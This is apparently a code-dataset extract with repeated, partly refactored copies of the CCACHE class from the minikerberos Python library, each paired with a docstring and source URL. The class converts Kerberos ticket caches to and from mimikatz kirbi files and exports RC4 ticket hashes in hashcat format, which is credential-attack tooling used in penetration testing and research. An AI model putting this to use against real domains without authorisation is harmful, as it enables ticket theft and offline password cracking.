t = self.file_format_version.to_bytes(2, byteorder='big', signed=False)
t_hdr = b''
for header in self.headers:
t_hdr += header.to_bytes()
t += len(t_hdr).to_bytes(2, byteorder='big', signed=False)
t += t_hdr
t += self.primary_principal.to_bytes()
for cred in self.credentials:
t += cred.to_bytes()
return t
def from_kirbifile(kirbi_filename):
kf_abs = os.path.abspath(kirbi_filename)
kirbidata = None
with open(kf_abs, 'rb') as f:
kirbidata = f.read()
return CCACHE.from_kirbi(kirbidata)
def from_kirbidir(directory_path):
"""
Iterates trough all .kirbi files in a given directory and converts all of them into one CCACHE object
"""
cc = CCACHE()
dir_path = os.path.join(os.path.abspath(directory_path), '*.kirbi')
for filename in glob.glob(dir_path):
with open(filename, 'rb') as f:
kirbidata = f.read()
kirbi = KRBCRED.load(kirbidata).native
cc.add_kirbi(kirbi)
return cc
def to_kirbidir(self, directory_path):
"""
Converts all credential object in the CCACHE object to the kirbi file format used by mimikatz.
The kirbi file format supports one credential per file, so prepare for a lot of files being generated.
directory_path: str the directory to write the kirbi files to
"""
kf_abs = os.path.abspath(directory_path)
for cred in self.credentials:
kirbi, filename = cred.to_kirbi()
filename = '%s.kirbi' % filename.replace('..','!')
filepath = os.path.join(kf_abs, filename)
with open(filepath, 'wb') as o:
o.write(kirbi.dump())
def from_file(filename):
"""
Parses the ccache file and returns a CCACHE object
"""
with open(filename, 'rb') as f:
return CCACHE.parse(f)
def to_file(self, filename):
"""
Writes the contents of the CCACHE object to a file
"""
with open(filename, 'wb') as f:
f.write(self.to_bytes())
|
skelsec/minikerberos | minikerberos/ccache.py | CCACHE.add_tgs | python | def add_tgs(self, tgs_rep, enc_tgs_rep_part, override_pp = False): #from AS_REP
c = Credential()
c.client = CCACHEPrincipal.from_asn1(tgs_rep['cname'], tgs_rep['crealm'])
if override_pp == True:
self.primary_principal = c.client
c.server = CCACHEPrincipal.from_asn1(enc_tgs_rep_part['sname'], enc_tgs_rep_part['srealm'])
c.time = Times.from_asn1(enc_tgs_rep_part)
c.key = Keyblock.from_asn1(enc_tgs_rep_part['key'])
c.is_skey = 0 #not sure!
c.tktflags = TicketFlags(enc_tgs_rep_part['flags']).cast(core.IntegerBitString).native
c.num_address = 0
c.num_authdata = 0
c.ticket = CCACHEOctetString.from_asn1(Ticket(tgs_rep['ticket']).dump())
c.second_ticket = CCACHEOctetString.empty()
self.credentials.append(c) | Creates credential object from the TGS and adds to the ccache file
The TGS is the native representation of the asn1 encoded TGS_REP data when the user requests a tgs to a specific service principal with a valid TGT
This function doesn't do decryption of the encrypted part of the tgs_rep object, it is expected that the decrypted XXX is supplied in enc_as_rep_part
override_pp: bool to determine if client principal should be used as the primary principal for the ccache file | train | https://github.com/skelsec/minikerberos/blob/caf14c1d0132119d6e8a8f05120efb7d0824b2c6/minikerberos/ccache.py#L491-L515 | [
"def from_asn1(data):\n\tk = Keyblock()\n\tk.keytype = data['keytype']\n\tk.etype = 0 # not sure\n\tk.keylen = len(data['keyvalue'])\n\tk.keyvalue = data['keyvalue']\n\n\treturn k\n",
"def from_asn1(enc_as_rep_part):\n\tt = Times()\n\tif 'authtime' in enc_as_rep_part and enc_as_rep_part['authtime']:\n\t\tt.authti... | class CCACHE:
"""
As the header is rarely used -mostly static- you'd need to init this object with empty = True to get an object without header already present
"""
def __init__(self, empty = False):
self.file_format_version = None #0x0504
self.headers = []
self.primary_principal = None
self.credentials = []
if empty == False:
self.__setup()
def __setup(self):
self.file_format_version = 0x0504
header = Header()
header.tag = 1
header.taglen = 8
#header.tagdata = b'\xff\xff\xff\xff\x00\x00\x00\x00'
header.tagdata = b'\x00\x00\x00\x00\x00\x00\x00\x00'
self.headers.append(header)
#t_hdr = b''
#for header in self.headers:
# t_hdr += header.to_bytes()
#self.headerlen = 1 #size of the entire header in bytes, encoded in 2 byte big-endian unsigned int
self.primary_principal = CCACHEPrincipal.dummy()
def __str__(self):
t = '== CCACHE ==\n'
t+= 'file_format_version : %s\n' % self.file_format_version
for header in self.headers:
t+= '%s\n' % header
t+= 'primary_principal : %s\n' % self.primary_principal
return t
def add_tgt(self, as_rep, enc_as_rep_part, override_pp = True): #from AS_REP
"""
Creates credential object from the TGT and adds to the ccache file
The TGT is basically the native representation of the asn1 encoded AS_REP data that the AD sends upon a succsessful TGT request.
This function doesn't do decryption of the encrypted part of the as_rep object, it is expected that the decrypted XXX is supplied in enc_as_rep_part
override_pp: bool to determine if client principal should be used as the primary principal for the ccache file
"""
c = Credential()
c.client = CCACHEPrincipal.from_asn1(as_rep['cname'], as_rep['crealm'])
if override_pp == True:
self.primary_principal = c.client
c.server = CCACHEPrincipal.from_asn1(enc_as_rep_part['sname'], enc_as_rep_part['srealm'])
c.time = Times.from_asn1(enc_as_rep_part)
c.key = Keyblock.from_asn1(enc_as_rep_part['key'])
c.is_skey = 0 #not sure!
c.tktflags = TicketFlags(enc_as_rep_part['flags']).cast(core.IntegerBitString).native
c.num_address = 0
c.num_authdata = 0
c.ticket = CCACHEOctetString.from_asn1(Ticket(as_rep['ticket']).dump())
c.second_ticket = CCACHEOctetString.empty()
self.credentials.append(c)
def add_tgs(self, tgs_rep, enc_tgs_rep_part, override_pp = False): #from AS_REP
"""
Creates credential object from the TGS and adds to the ccache file
The TGS is the native representation of the asn1 encoded TGS_REP data when the user requests a tgs to a specific service principal with a valid TGT
This function doesn't do decryption of the encrypted part of the tgs_rep object, it is expected that the decrypted XXX is supplied in enc_as_rep_part
override_pp: bool to determine if client principal should be used as the primary principal for the ccache file
"""
c = Credential()
c.client = CCACHEPrincipal.from_asn1(tgs_rep['cname'], tgs_rep['crealm'])
if override_pp == True:
self.primary_principal = c.client
c.server = CCACHEPrincipal.from_asn1(enc_tgs_rep_part['sname'], enc_tgs_rep_part['srealm'])
c.time = Times.from_asn1(enc_tgs_rep_part)
c.key = Keyblock.from_asn1(enc_tgs_rep_part['key'])
c.is_skey = 0 #not sure!
c.tktflags = TicketFlags(enc_tgs_rep_part['flags']).cast(core.IntegerBitString).native
c.num_address = 0
c.num_authdata = 0
c.ticket = CCACHEOctetString.from_asn1(Ticket(tgs_rep['ticket']).dump())
c.second_ticket = CCACHEOctetString.empty()
self.credentials.append(c)
def add_kirbi(self, krbcred, override_pp = True, include_expired = False):
# Build a Credential from a KRB-CRED ("kirbi") structure and append it to this ccache.
# krbcred: native (dict) representation of an asn1-decoded KRB-CRED message.
# override_pp: if True, the ticket's client principal becomes the ccache primary principal.
# include_expired: currently has no effect -- the expiry check that would use it is
# disabled below (it sits inside a bare string literal, so it is never executed).
c = Credential()
# Decrypt-free path: the enc-part cipher blob is loaded directly; kirbi files carry it in the clear.
enc_credinfo = EncKrbCredPart.load(krbcred['enc-part']['cipher']).native
ticket_info = enc_credinfo['ticket-info'][0]
# NOTE(review): the block below is a string literal, i.e. intentionally disabled dead code.
# Re-enabling it would make expired tickets get skipped unless include_expired is set -- confirm
# before activating.
"""
if ticket_info['endtime'] < datetime.datetime.now(datetime.timezone.utc):
if include_expired == True:
logging.debug('This ticket has most likely expired, but include_expired is forcing me to add it to cache! This can cause problems!')
else:
logging.debug('This ticket has most likely expired, skipping')
return
"""
c.client = CCACHEPrincipal.from_asn1(ticket_info['pname'], ticket_info['prealm'])
if override_pp == True:
self.primary_principal = c.client
# Workaround: if the sname name-string also carries the realm as its last element,
# impacket will crash when reading the resulting ccache, so trim that element off.
if len(ticket_info['sname']['name-string']) > 2 and ticket_info['sname']['name-string'][-1].upper() == ticket_info['srealm'].upper():
logging.debug('SNAME contains the realm as well, trimming it')
t = ticket_info['sname']
t['name-string'] = t['name-string'][:-1]
c.server = CCACHEPrincipal.from_asn1(t, ticket_info['srealm'])
else:
c.server = CCACHEPrincipal.from_asn1(ticket_info['sname'], ticket_info['srealm'])
c.time = Times.from_asn1(ticket_info)
c.key = Keyblock.from_asn1(ticket_info['key'])
c.is_skey = 0 #not sure!
c.tktflags = TicketFlags(ticket_info['flags']).cast(core.IntegerBitString).native
c.num_address = 0
c.num_authdata = 0
c.ticket = CCACHEOctetString.from_asn1(Ticket(krbcred['tickets'][0]).dump()) #kirbi only stores one ticket per file
c.second_ticket = CCACHEOctetString.empty()
self.credentials.append(c)
@staticmethod
def from_kirbi(kirbidata):
    """
    Parse raw KRB-CRED ("kirbi") bytes and return a new CCACHE holding that
    single credential.

    Marked @staticmethod because the function takes no self/cls; without the
    decorator an instance call (cc.from_kirbi(data)) would mis-bind the
    instance as kirbidata. Class-level calls keep working unchanged.
    """
    kirbi = KRBCRED.load(kirbidata).native
    cc = CCACHE()
    cc.add_kirbi(kirbi)
    return cc
def get_all_tgt(self):
    """
    Return a list of AS_REP tickets in native format (dict).

    A credential is considered a TGT when its server principal string
    contains 'krbtgt' (the Kerberos ticket-granting service).
    """
    return [
        cred.to_tgt()
        for cred in self.credentials
        if 'krbtgt' in cred.server.to_string().lower()
    ]
def get_hashes(self, all_hashes = False):
    """
    Return a list of hashes in hashcat-friendly format for tickets with
    encryption type 23 (RC4).

    all_hashes: overrides the encryption-type filter and returns a hash for
    every ticket regardless of etype.
    """
    hashcat_lines = []
    for cred in self.credentials:
        ticket = Ticket.load(cred.ticket.to_asn1()).native
        # Keep the original evaluation order: etype check first, then the override flag.
        if int(ticket['enc-part']['etype']) == 23 or all_hashes == True:
            hashcat_lines.append(cred.to_hash())
    return hashcat_lines
@staticmethod
def parse(reader):
    """
    Parse a ccache from a binary, seekable file-like object and return a
    CCACHE instance.

    Layout read: 2-byte big-endian version, 2-byte big-endian header size,
    header block, primary principal, then credentials until end of stream.
    Marked @staticmethod because the function takes no self/cls.
    """
    c = CCACHE(True)
    c.file_format_version = int.from_bytes(reader.read(2), byteorder='big', signed=False)
    hdr_size = int.from_bytes(reader.read(2), byteorder='big', signed=False)
    c.headers = Header.parse(reader.read(hdr_size))
    c.primary_principal = CCACHEPrincipal.parse(reader)
    # Remember our position, find the end of the stream, then come back and
    # read credentials until we reach it.
    pos = reader.tell()
    # NOTE(review): seek(-1, 2) makes eof = size - 1, so the loop condition is
    # off by one relative to true EOF; it works as long as no credential ends
    # exactly one byte before the end -- confirm before changing.
    reader.seek(-1, 2)
    eof = reader.tell()
    reader.seek(pos, 0)
    while reader.tell() < eof:
        c.credentials.append(Credential.parse(reader))
    return c
def to_bytes(self):
    """
    Serialize this CCACHE object into the binary ccache file format:
    2-byte version, 2-byte header length, header block, primary principal,
    then every credential in order.
    """
    header_blob = b''.join(h.to_bytes() for h in self.headers)
    chunks = [
        self.file_format_version.to_bytes(2, byteorder='big', signed=False),
        len(header_blob).to_bytes(2, byteorder='big', signed=False),
        header_blob,
        self.primary_principal.to_bytes(),
    ]
    chunks.extend(cred.to_bytes() for cred in self.credentials)
    return b''.join(chunks)
@staticmethod
def from_kirbifile(kirbi_filename):
    """
    Read a single .kirbi file from disk and return a CCACHE built from it.

    Marked @staticmethod because the function takes no self/cls; the
    redundant kirbidata = None pre-initialization was dropped.
    """
    kf_abs = os.path.abspath(kirbi_filename)
    with open(kf_abs, 'rb') as f:
        kirbidata = f.read()
    return CCACHE.from_kirbi(kirbidata)
@staticmethod
def from_kirbidir(directory_path):
    """
    Iterate through all .kirbi files in a given directory and merge all of
    them into one CCACHE object.

    Marked @staticmethod because the function takes no self/cls.
    """
    cc = CCACHE()
    dir_path = os.path.join(os.path.abspath(directory_path), '*.kirbi')
    for filename in glob.glob(dir_path):
        with open(filename, 'rb') as f:
            kirbidata = f.read()
        kirbi = KRBCRED.load(kirbidata).native
        cc.add_kirbi(kirbi)
    return cc
def to_kirbidir(self, directory_path):
    """
    Convert every credential in this CCACHE to the kirbi file format used by
    mimikatz and write each one to its own file under directory_path (the
    kirbi format holds a single credential per file, so expect many files).
    """
    out_dir = os.path.abspath(directory_path)
    for cred in self.credentials:
        kirbi, basename = cred.to_kirbi()
        # '..' is not allowed in the generated file name; replace it with '!'.
        out_name = '%s.kirbi' % basename.replace('..', '!')
        with open(os.path.join(out_dir, out_name), 'wb') as out_handle:
            out_handle.write(kirbi.dump())
@staticmethod
def from_file(filename):
    """
    Parse the ccache file at *filename* and return a CCACHE object.

    Marked @staticmethod because the function takes no self/cls; without the
    decorator an instance call would mis-bind the instance as filename.
    """
    with open(filename, 'rb') as f:
        return CCACHE.parse(f)
def to_file(self, filename):
    """
    Serialize this CCACHE object and write the resulting bytes to *filename*.
    """
    with open(filename, 'wb') as out_handle:
        out_handle.write(self.to_bytes())
|
skelsec/minikerberos | minikerberos/ccache.py | CCACHE.add_kirbi | python | def add_kirbi(self, krbcred, override_pp = True, include_expired = False):
c = Credential()
enc_credinfo = EncKrbCredPart.load(krbcred['enc-part']['cipher']).native
ticket_info = enc_credinfo['ticket-info'][0]
c.client = CCACHEPrincipal.from_asn1(ticket_info['pname'], ticket_info['prealm'])
if override_pp == True:
self.primary_principal = c.client
#yaaaaay 4 additional weirdness!!!!
#if sname name-string contains a realm as well htne impacket will crash miserably :(
if len(ticket_info['sname']['name-string']) > 2 and ticket_info['sname']['name-string'][-1].upper() == ticket_info['srealm'].upper():
logging.debug('SNAME contains the realm as well, trimming it')
t = ticket_info['sname']
t['name-string'] = t['name-string'][:-1]
c.server = CCACHEPrincipal.from_asn1(t, ticket_info['srealm'])
else:
c.server = CCACHEPrincipal.from_asn1(ticket_info['sname'], ticket_info['srealm'])
c.time = Times.from_asn1(ticket_info)
c.key = Keyblock.from_asn1(ticket_info['key'])
c.is_skey = 0 #not sure!
c.tktflags = TicketFlags(ticket_info['flags']).cast(core.IntegerBitString).native
c.num_address = 0
c.num_authdata = 0
c.ticket = CCACHEOctetString.from_asn1(Ticket(krbcred['tickets'][0]).dump()) #kirbi only stores one ticket per file
c.second_ticket = CCACHEOctetString.empty()
self.credentials.append(c) | if ticket_info['endtime'] < datetime.datetime.now(datetime.timezone.utc):
if include_expired == True:
logging.debug('This ticket has most likely expired, but include_expired is forcing me to add it to cache! This can cause problems!')
else:
logging.debug('This ticket has most likely expired, skipping')
return | train | https://github.com/skelsec/minikerberos/blob/caf14c1d0132119d6e8a8f05120efb7d0824b2c6/minikerberos/ccache.py#L518-L557 | [
"def from_asn1(data):\n\tk = Keyblock()\n\tk.keytype = data['keytype']\n\tk.etype = 0 # not sure\n\tk.keylen = len(data['keyvalue'])\n\tk.keyvalue = data['keyvalue']\n\n\treturn k\n",
"def from_asn1(enc_as_rep_part):\n\tt = Times()\n\tif 'authtime' in enc_as_rep_part and enc_as_rep_part['authtime']:\n\t\tt.authti... | class CCACHE:
"""
As the header is rarely used -mostly static- you'd need to init this object with empty = True to get an object without header already present
"""
def __init__(self, empty = False):
self.file_format_version = None #0x0504
self.headers = []
self.primary_principal = None
self.credentials = []
if empty == False:
self.__setup()
def __setup(self):
self.file_format_version = 0x0504
header = Header()
header.tag = 1
header.taglen = 8
#header.tagdata = b'\xff\xff\xff\xff\x00\x00\x00\x00'
header.tagdata = b'\x00\x00\x00\x00\x00\x00\x00\x00'
self.headers.append(header)
#t_hdr = b''
#for header in self.headers:
# t_hdr += header.to_bytes()
#self.headerlen = 1 #size of the entire header in bytes, encoded in 2 byte big-endian unsigned int
self.primary_principal = CCACHEPrincipal.dummy()
def __str__(self):
t = '== CCACHE ==\n'
t+= 'file_format_version : %s\n' % self.file_format_version
for header in self.headers:
t+= '%s\n' % header
t+= 'primary_principal : %s\n' % self.primary_principal
return t
def add_tgt(self, as_rep, enc_as_rep_part, override_pp = True): #from AS_REP
"""
Creates credential object from the TGT and adds to the ccache file
The TGT is basically the native representation of the asn1 encoded AS_REP data that the AD sends upon a succsessful TGT request.
This function doesn't do decryption of the encrypted part of the as_rep object, it is expected that the decrypted XXX is supplied in enc_as_rep_part
override_pp: bool to determine if client principal should be used as the primary principal for the ccache file
"""
c = Credential()
c.client = CCACHEPrincipal.from_asn1(as_rep['cname'], as_rep['crealm'])
if override_pp == True:
self.primary_principal = c.client
c.server = CCACHEPrincipal.from_asn1(enc_as_rep_part['sname'], enc_as_rep_part['srealm'])
c.time = Times.from_asn1(enc_as_rep_part)
c.key = Keyblock.from_asn1(enc_as_rep_part['key'])
c.is_skey = 0 #not sure!
c.tktflags = TicketFlags(enc_as_rep_part['flags']).cast(core.IntegerBitString).native
c.num_address = 0
c.num_authdata = 0
c.ticket = CCACHEOctetString.from_asn1(Ticket(as_rep['ticket']).dump())
c.second_ticket = CCACHEOctetString.empty()
self.credentials.append(c)
def add_tgs(self, tgs_rep, enc_tgs_rep_part, override_pp = False): #from AS_REP
"""
Creates credential object from the TGS and adds to the ccache file
The TGS is the native representation of the asn1 encoded TGS_REP data when the user requests a tgs to a specific service principal with a valid TGT
This function doesn't do decryption of the encrypted part of the tgs_rep object, it is expected that the decrypted XXX is supplied in enc_as_rep_part
override_pp: bool to determine if client principal should be used as the primary principal for the ccache file
"""
c = Credential()
c.client = CCACHEPrincipal.from_asn1(tgs_rep['cname'], tgs_rep['crealm'])
if override_pp == True:
self.primary_principal = c.client
c.server = CCACHEPrincipal.from_asn1(enc_tgs_rep_part['sname'], enc_tgs_rep_part['srealm'])
c.time = Times.from_asn1(enc_tgs_rep_part)
c.key = Keyblock.from_asn1(enc_tgs_rep_part['key'])
c.is_skey = 0 #not sure!
c.tktflags = TicketFlags(enc_tgs_rep_part['flags']).cast(core.IntegerBitString).native
c.num_address = 0
c.num_authdata = 0
c.ticket = CCACHEOctetString.from_asn1(Ticket(tgs_rep['ticket']).dump())
c.second_ticket = CCACHEOctetString.empty()
self.credentials.append(c)
def add_kirbi(self, krbcred, override_pp = True, include_expired = False):
c = Credential()
enc_credinfo = EncKrbCredPart.load(krbcred['enc-part']['cipher']).native
ticket_info = enc_credinfo['ticket-info'][0]
"""
if ticket_info['endtime'] < datetime.datetime.now(datetime.timezone.utc):
if include_expired == True:
logging.debug('This ticket has most likely expired, but include_expired is forcing me to add it to cache! This can cause problems!')
else:
logging.debug('This ticket has most likely expired, skipping')
return
"""
c.client = CCACHEPrincipal.from_asn1(ticket_info['pname'], ticket_info['prealm'])
if override_pp == True:
self.primary_principal = c.client
#yaaaaay 4 additional weirdness!!!!
#if sname name-string contains a realm as well htne impacket will crash miserably :(
if len(ticket_info['sname']['name-string']) > 2 and ticket_info['sname']['name-string'][-1].upper() == ticket_info['srealm'].upper():
logging.debug('SNAME contains the realm as well, trimming it')
t = ticket_info['sname']
t['name-string'] = t['name-string'][:-1]
c.server = CCACHEPrincipal.from_asn1(t, ticket_info['srealm'])
else:
c.server = CCACHEPrincipal.from_asn1(ticket_info['sname'], ticket_info['srealm'])
c.time = Times.from_asn1(ticket_info)
c.key = Keyblock.from_asn1(ticket_info['key'])
c.is_skey = 0 #not sure!
c.tktflags = TicketFlags(ticket_info['flags']).cast(core.IntegerBitString).native
c.num_address = 0
c.num_authdata = 0
c.ticket = CCACHEOctetString.from_asn1(Ticket(krbcred['tickets'][0]).dump()) #kirbi only stores one ticket per file
c.second_ticket = CCACHEOctetString.empty()
self.credentials.append(c)
def from_kirbi(kirbidata):
kirbi = KRBCRED.load(kirbidata).native
cc = CCACHE()
cc.add_kirbi(kirbi)
return cc
def get_all_tgt(self):
"""
Returns a list of AS_REP tickets in native format (dict).
To determine which ticket are AP_REP we check for the server principal to be the kerberos service
"""
tgts = []
for cred in self.credentials:
if cred.server.to_string().lower().find('krbtgt') != -1:
tgts.append(cred.to_tgt())
return tgts
def get_hashes(self, all_hashes = False):
"""
Returns a list of hashes in hashcat-firendly format for tickets with encryption type 23 (which is RC4)
all_hashes: overrides the encryption type filtering and returns hash for all tickets
"""
hashes = []
for cred in self.credentials:
res = Ticket.load(cred.ticket.to_asn1()).native
if int(res['enc-part']['etype']) == 23 or all_hashes == True:
hashes.append(cred.to_hash())
return hashes
def parse(reader):
c = CCACHE(True)
c.file_format_version = int.from_bytes(reader.read(2), byteorder='big', signed=False)
hdr_size = int.from_bytes(reader.read(2), byteorder='big', signed=False)
c.headers = Header.parse(reader.read(hdr_size))
#c.headerlen =
#for i in range(c.headerlen):
# c.headers.append(Header.parse(reader))
c.primary_principal = CCACHEPrincipal.parse(reader)
pos = reader.tell()
reader.seek(-1,2)
eof = reader.tell()
reader.seek(pos,0)
while reader.tell() < eof:
c.credentials.append(Credential.parse(reader))
return c
def to_bytes(self):
t = self.file_format_version.to_bytes(2, byteorder='big', signed=False)
t_hdr = b''
for header in self.headers:
t_hdr += header.to_bytes()
t += len(t_hdr).to_bytes(2, byteorder='big', signed=False)
t += t_hdr
t += self.primary_principal.to_bytes()
for cred in self.credentials:
t += cred.to_bytes()
return t
def from_kirbifile(kirbi_filename):
kf_abs = os.path.abspath(kirbi_filename)
kirbidata = None
with open(kf_abs, 'rb') as f:
kirbidata = f.read()
return CCACHE.from_kirbi(kirbidata)
def from_kirbidir(directory_path):
"""
Iterates trough all .kirbi files in a given directory and converts all of them into one CCACHE object
"""
cc = CCACHE()
dir_path = os.path.join(os.path.abspath(directory_path), '*.kirbi')
for filename in glob.glob(dir_path):
with open(filename, 'rb') as f:
kirbidata = f.read()
kirbi = KRBCRED.load(kirbidata).native
cc.add_kirbi(kirbi)
return cc
def to_kirbidir(self, directory_path):
"""
Converts all credential object in the CCACHE object to the kirbi file format used by mimikatz.
The kirbi file format supports one credential per file, so prepare for a lot of files being generated.
directory_path: str the directory to write the kirbi files to
"""
kf_abs = os.path.abspath(directory_path)
for cred in self.credentials:
kirbi, filename = cred.to_kirbi()
filename = '%s.kirbi' % filename.replace('..','!')
filepath = os.path.join(kf_abs, filename)
with open(filepath, 'wb') as o:
o.write(kirbi.dump())
def from_file(filename):
"""
Parses the ccache file and returns a CCACHE object
"""
with open(filename, 'rb') as f:
return CCACHE.parse(f)
def to_file(self, filename):
"""
Writes the contents of the CCACHE object to a file
"""
with open(filename, 'wb') as f:
f.write(self.to_bytes())
|
skelsec/minikerberos | minikerberos/ccache.py | CCACHE.get_all_tgt | python | def get_all_tgt(self):
tgts = []
for cred in self.credentials:
if cred.server.to_string().lower().find('krbtgt') != -1:
tgts.append(cred.to_tgt())
return tgts | Returns a list of AS_REP tickets in native format (dict).
To determine which ticket are AP_REP we check for the server principal to be the kerberos service | train | https://github.com/skelsec/minikerberos/blob/caf14c1d0132119d6e8a8f05120efb7d0824b2c6/minikerberos/ccache.py#L566-L576 | null | class CCACHE:
"""
As the header is rarely used -mostly static- you'd need to init this object with empty = True to get an object without header already present
"""
def __init__(self, empty = False):
self.file_format_version = None #0x0504
self.headers = []
self.primary_principal = None
self.credentials = []
if empty == False:
self.__setup()
def __setup(self):
self.file_format_version = 0x0504
header = Header()
header.tag = 1
header.taglen = 8
#header.tagdata = b'\xff\xff\xff\xff\x00\x00\x00\x00'
header.tagdata = b'\x00\x00\x00\x00\x00\x00\x00\x00'
self.headers.append(header)
#t_hdr = b''
#for header in self.headers:
# t_hdr += header.to_bytes()
#self.headerlen = 1 #size of the entire header in bytes, encoded in 2 byte big-endian unsigned int
self.primary_principal = CCACHEPrincipal.dummy()
def __str__(self):
t = '== CCACHE ==\n'
t+= 'file_format_version : %s\n' % self.file_format_version
for header in self.headers:
t+= '%s\n' % header
t+= 'primary_principal : %s\n' % self.primary_principal
return t
def add_tgt(self, as_rep, enc_as_rep_part, override_pp = True): #from AS_REP
"""
Creates credential object from the TGT and adds to the ccache file
The TGT is basically the native representation of the asn1 encoded AS_REP data that the AD sends upon a succsessful TGT request.
This function doesn't do decryption of the encrypted part of the as_rep object, it is expected that the decrypted XXX is supplied in enc_as_rep_part
override_pp: bool to determine if client principal should be used as the primary principal for the ccache file
"""
c = Credential()
c.client = CCACHEPrincipal.from_asn1(as_rep['cname'], as_rep['crealm'])
if override_pp == True:
self.primary_principal = c.client
c.server = CCACHEPrincipal.from_asn1(enc_as_rep_part['sname'], enc_as_rep_part['srealm'])
c.time = Times.from_asn1(enc_as_rep_part)
c.key = Keyblock.from_asn1(enc_as_rep_part['key'])
c.is_skey = 0 #not sure!
c.tktflags = TicketFlags(enc_as_rep_part['flags']).cast(core.IntegerBitString).native
c.num_address = 0
c.num_authdata = 0
c.ticket = CCACHEOctetString.from_asn1(Ticket(as_rep['ticket']).dump())
c.second_ticket = CCACHEOctetString.empty()
self.credentials.append(c)
def add_tgs(self, tgs_rep, enc_tgs_rep_part, override_pp = False): #from AS_REP
"""
Creates credential object from the TGS and adds to the ccache file
The TGS is the native representation of the asn1 encoded TGS_REP data when the user requests a tgs to a specific service principal with a valid TGT
This function doesn't do decryption of the encrypted part of the tgs_rep object, it is expected that the decrypted XXX is supplied in enc_as_rep_part
override_pp: bool to determine if client principal should be used as the primary principal for the ccache file
"""
c = Credential()
c.client = CCACHEPrincipal.from_asn1(tgs_rep['cname'], tgs_rep['crealm'])
if override_pp == True:
self.primary_principal = c.client
c.server = CCACHEPrincipal.from_asn1(enc_tgs_rep_part['sname'], enc_tgs_rep_part['srealm'])
c.time = Times.from_asn1(enc_tgs_rep_part)
c.key = Keyblock.from_asn1(enc_tgs_rep_part['key'])
c.is_skey = 0 #not sure!
c.tktflags = TicketFlags(enc_tgs_rep_part['flags']).cast(core.IntegerBitString).native
c.num_address = 0
c.num_authdata = 0
c.ticket = CCACHEOctetString.from_asn1(Ticket(tgs_rep['ticket']).dump())
c.second_ticket = CCACHEOctetString.empty()
self.credentials.append(c)
def add_kirbi(self, krbcred, override_pp = True, include_expired = False):
c = Credential()
enc_credinfo = EncKrbCredPart.load(krbcred['enc-part']['cipher']).native
ticket_info = enc_credinfo['ticket-info'][0]
"""
if ticket_info['endtime'] < datetime.datetime.now(datetime.timezone.utc):
if include_expired == True:
logging.debug('This ticket has most likely expired, but include_expired is forcing me to add it to cache! This can cause problems!')
else:
logging.debug('This ticket has most likely expired, skipping')
return
"""
c.client = CCACHEPrincipal.from_asn1(ticket_info['pname'], ticket_info['prealm'])
if override_pp == True:
self.primary_principal = c.client
#yaaaaay 4 additional weirdness!!!!
#if sname name-string contains a realm as well htne impacket will crash miserably :(
if len(ticket_info['sname']['name-string']) > 2 and ticket_info['sname']['name-string'][-1].upper() == ticket_info['srealm'].upper():
logging.debug('SNAME contains the realm as well, trimming it')
t = ticket_info['sname']
t['name-string'] = t['name-string'][:-1]
c.server = CCACHEPrincipal.from_asn1(t, ticket_info['srealm'])
else:
c.server = CCACHEPrincipal.from_asn1(ticket_info['sname'], ticket_info['srealm'])
c.time = Times.from_asn1(ticket_info)
c.key = Keyblock.from_asn1(ticket_info['key'])
c.is_skey = 0 #not sure!
c.tktflags = TicketFlags(ticket_info['flags']).cast(core.IntegerBitString).native
c.num_address = 0
c.num_authdata = 0
c.ticket = CCACHEOctetString.from_asn1(Ticket(krbcred['tickets'][0]).dump()) #kirbi only stores one ticket per file
c.second_ticket = CCACHEOctetString.empty()
self.credentials.append(c)
def from_kirbi(kirbidata):
kirbi = KRBCRED.load(kirbidata).native
cc = CCACHE()
cc.add_kirbi(kirbi)
return cc
def get_hashes(self, all_hashes = False):
"""
Returns a list of hashes in hashcat-firendly format for tickets with encryption type 23 (which is RC4)
all_hashes: overrides the encryption type filtering and returns hash for all tickets
"""
hashes = []
for cred in self.credentials:
res = Ticket.load(cred.ticket.to_asn1()).native
if int(res['enc-part']['etype']) == 23 or all_hashes == True:
hashes.append(cred.to_hash())
return hashes
def parse(reader):
c = CCACHE(True)
c.file_format_version = int.from_bytes(reader.read(2), byteorder='big', signed=False)
hdr_size = int.from_bytes(reader.read(2), byteorder='big', signed=False)
c.headers = Header.parse(reader.read(hdr_size))
#c.headerlen =
#for i in range(c.headerlen):
# c.headers.append(Header.parse(reader))
c.primary_principal = CCACHEPrincipal.parse(reader)
pos = reader.tell()
reader.seek(-1,2)
eof = reader.tell()
reader.seek(pos,0)
while reader.tell() < eof:
c.credentials.append(Credential.parse(reader))
return c
def to_bytes(self):
t = self.file_format_version.to_bytes(2, byteorder='big', signed=False)
t_hdr = b''
for header in self.headers:
t_hdr += header.to_bytes()
t += len(t_hdr).to_bytes(2, byteorder='big', signed=False)
t += t_hdr
t += self.primary_principal.to_bytes()
for cred in self.credentials:
t += cred.to_bytes()
return t
def from_kirbifile(kirbi_filename):
kf_abs = os.path.abspath(kirbi_filename)
kirbidata = None
with open(kf_abs, 'rb') as f:
kirbidata = f.read()
return CCACHE.from_kirbi(kirbidata)
def from_kirbidir(directory_path):
"""
Iterates trough all .kirbi files in a given directory and converts all of them into one CCACHE object
"""
cc = CCACHE()
dir_path = os.path.join(os.path.abspath(directory_path), '*.kirbi')
for filename in glob.glob(dir_path):
with open(filename, 'rb') as f:
kirbidata = f.read()
kirbi = KRBCRED.load(kirbidata).native
cc.add_kirbi(kirbi)
return cc
def to_kirbidir(self, directory_path):
"""
Converts all credential object in the CCACHE object to the kirbi file format used by mimikatz.
The kirbi file format supports one credential per file, so prepare for a lot of files being generated.
directory_path: str the directory to write the kirbi files to
"""
kf_abs = os.path.abspath(directory_path)
for cred in self.credentials:
kirbi, filename = cred.to_kirbi()
filename = '%s.kirbi' % filename.replace('..','!')
filepath = os.path.join(kf_abs, filename)
with open(filepath, 'wb') as o:
o.write(kirbi.dump())
def from_file(filename):
"""
Parses the ccache file and returns a CCACHE object
"""
with open(filename, 'rb') as f:
return CCACHE.parse(f)
def to_file(self, filename):
"""
Writes the contents of the CCACHE object to a file
"""
with open(filename, 'wb') as f:
f.write(self.to_bytes())
|
skelsec/minikerberos | minikerberos/ccache.py | CCACHE.get_hashes | python | def get_hashes(self, all_hashes = False):
hashes = []
for cred in self.credentials:
res = Ticket.load(cred.ticket.to_asn1()).native
if int(res['enc-part']['etype']) == 23 or all_hashes == True:
hashes.append(cred.to_hash())
return hashes | Returns a list of hashes in hashcat-firendly format for tickets with encryption type 23 (which is RC4)
